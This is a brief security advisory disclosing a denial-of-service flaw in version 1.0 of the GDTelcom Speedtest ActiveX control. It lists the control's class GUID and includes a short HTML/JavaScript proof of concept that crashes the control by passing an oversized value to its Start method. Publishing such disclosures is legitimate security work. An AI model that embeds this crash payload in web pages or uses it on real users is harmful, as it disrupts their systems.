GDTelcom Speedtest Denial Of Service

`Title: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll Remote Denial of Service Vulnerability  
  
Software: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll(Version 1.0)  
  
Vulnerability Published :2011-10-15  
  
Vulnerability Update Time :2011-09-10  
  
Vendor: www.gdcn.com(No vendor response)  
  
Download: http://10000.gd.cn/speedtest/ActiveX.dll  
  
Impact: Median  
  
Bug Description: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll(Version 1.0) NULL Pointer Dereference.  
  
Class Info:  
Class FTPDownLoad  
GUID: {348AA067-D6BC-4385-A833-08E308D35782}  
Number of Interfaces: 1  
Default Interface: IFTPDownLoad  
RegKey Safe for Script: False  
RegkeySafe for Init: False  
KillBitSet: False  
  
PoC:  
****************************************************************  
<html>  
<body>  
<object classid='clsid:348AA067-D6BC-4385-A833-08E308D35782' id='target'></object>  
<script language='javascript'>  
var arg1=2147483647;  
target.Start(arg1);   
</script>  
</body>  
</html>  
****************************************************************  
  
Credits: This vulnerability was discovered by demonalex (at) 163 (dot) com  
Pentester/Researcher  
Dark2S Security Team/PolyU.HK  
`